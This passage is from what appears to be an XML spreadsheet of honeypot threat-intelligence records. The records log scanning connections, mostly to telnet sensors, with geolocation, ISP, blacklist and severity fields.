    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679d:98a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1547"/>
    <x v="1547"/>
    <s v="i209034.upc-i.chello.nl&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T05:11:20"/>
    <d v="2025-04-04T07:47:44"/>
    <d v="2025-04-16T05:11:20"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Haarlemermeer"/>
    <s v="Schiphol-Rijk"/>
    <s v="10173838"/>
    <s v="1119"/>
    <s v="52.2773"/>
    <s v="4.74898"/>
    <s v="33915"/>
    <s v="Vodafone Libertel B.V."/>
    <s v="A2000 / Kabeltelevisie Amsterdam B.V."/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3ec3:d122"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1548"/>
    <x v="1548"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T05:04:31"/>
    <d v="2025-04-15T02:27:16"/>
    <d v="2025-04-16T05:04:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13696"/>
    <s v="101.694"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="residential"/>
    <s v="Adsl Streamyx"/>
    <s v="2004-06-07"/>
    <s v="TTSSB-MY"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c36:eaf1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1549"/>
    <x v="1549"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T05:01:54"/>
    <d v="2025-04-16T05:01:54"/>
    <d v="2025-04-16T05:01:54"/>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3:f694"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1550"/>
    <x v="1550"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T04:57:10"/>
    <d v="2025-04-16T04:57:10"/>
    <d v="2025-04-16T04:57:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Raigad"/>
    <s v="Alibag"/>
    <s v="1279027"/>
    <s v="402201"/>
    <s v="18.6539"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:d926"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1551"/>
    <x v="1551"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T04:45:58"/>
    <d v="2025-04-15T20:33:28"/>
    <d v="2025-04-16T04:45:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f99c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1552"/>
    <x v="1552"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T04:21:29"/>
    <d v="2025-04-16T04:21:29"/>
    <d v="2025-04-16T04:21:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:1b91"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1553"/>
    <x v="1553"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T04:13:38"/>
    <d v="2025-04-15T17:23:52"/>
    <d v="2025-04-16T04:13:38"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="AN"/>
    <s v="Andalusia"/>
    <s v="Cordoba"/>
    <s v="Villarrubia"/>
    <s v="2509488"/>
    <s v="14710"/>
    <s v="37.85"/>
    <s v="-4.9"/>
    <s v="201105"/>
    <s v="WIFI INTERSUR S.L."/>
    <s v="Wifi Intersur S.L."/>
    <s v="business"/>
    <s v="Intersur Movil S.L"/>
    <s v="2017-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c6:b509"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1554"/>
    <x v="1554"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T04:11:21"/>
    <d v="2025-04-16T01:47:23"/>
    <d v="2025-04-16T04:11:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:47b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1555"/>
    <x v="1555"/>
    <s v="161.91-149-6.customer.lyse.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T03:40:49"/>
    <d v="2023-12-16T01:13:54"/>
    <d v="2025-04-16T03:40:49"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="31438&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="03"/>
    <s v="Oslo"/>
    <s v="Oslo"/>
    <s v="Oslo (Nordre Aker District)"/>
    <s v="3143244"/>
    <s v="0001"/>
    <s v="59.9488"/>
    <s v="10.7638"/>
    <s v="203995"/>
    <s v="Lyse Tele AS"/>
    <s v="Lyse Tele AS"/>
    <s v="business"/>
    <s v="Ice Communication Norge"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5b95:6a1"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1556"/>
    <x v="1556"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T03:38:26"/>
    <d v="2025-04-04T13:02:11"/>
    <d v="2025-04-16T03:38:26"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H43"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Gavate Wadi)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.17"/>
    <s v="73.0014"/>
    <s v="132215"/>
    <s v="Powergrid Teleservices Limited"/>
    <s v="SIFYNET"/>
    <s v="business"/>
    <s v="Sify Limited"/>
    <s v="2011-03-31"/>
    <s v="SIFYNET-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:107:97c2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1557"/>
    <x v="1557"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T03:36:15"/>
    <d v="2025-04-16T03:36:15"/>
    <d v="2025-04-16T03:36:15"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:e141"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1558"/>
    <x v="1558"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T03:27:56"/>
    <d v="2025-04-16T03:27:56"/>
    <d v="2025-04-16T03:27:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:c636"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1559"/>
    <x v="1559"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T03:17:24"/>
    <d v="2025-04-16T03:17:24"/>
    <d v="2025-04-16T03:17:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="Quận Bình Thạnh"/>
    <s v="Quận Bình Thạnh"/>
    <s v="9645087"/>
    <s v="NA"/>
    <s v="10.8033"/>
    <s v="106.697"/>
    <s v="45899"/>
    <s v="VNPT-AS-VN"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="corporate"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b15:5ec"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1560"/>
    <x v="1560"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T03:16:20"/>
    <d v="2025-04-16T03:13:03"/>
    <d v="2025-04-16T03:16:20"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Barbacena"/>
    <s v="Barbacena"/>
    <s v="3470858"/>
    <s v="NA"/>
    <s v="-21.2258"/>
    <s v="-43.7736"/>
    <s v="28219"/>
    <s v="Net Rosas Telecomunicações Ltda."/>
    <s v="Net Rosas Telecomunicações Ltda."/>
    <s v="business"/>
    <s v="Net Rosas Telecomunicações Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:baec:eda6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1561"/>
    <x v="1561"/>
    <s v="122-116-116-253.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:58:28"/>
    <d v="2024-08-29T18:22:13"/>
    <d v="2025-04-16T02:58:28"/>
    <n v="414"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;18734&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:74fd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1562"/>
    <x v="1562"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:54:45"/>
    <d v="2025-04-16T02:54:45"/>
    <d v="2025-04-16T02:54:45"/>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3b5d:3033"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1563"/>
    <x v="1563"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T02:51:51"/>
    <d v="2025-02-22T15:32:39"/>
    <d v="2025-04-16T02:51:51"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H22"/>
    <s v="8443&amp;&amp;80&amp;&amp;143&amp;&amp;110&amp;&amp;25&amp;&amp;5432&amp;&amp;5900&amp;&amp;443&amp;&amp;3389"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '103.211.202.140:8443', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 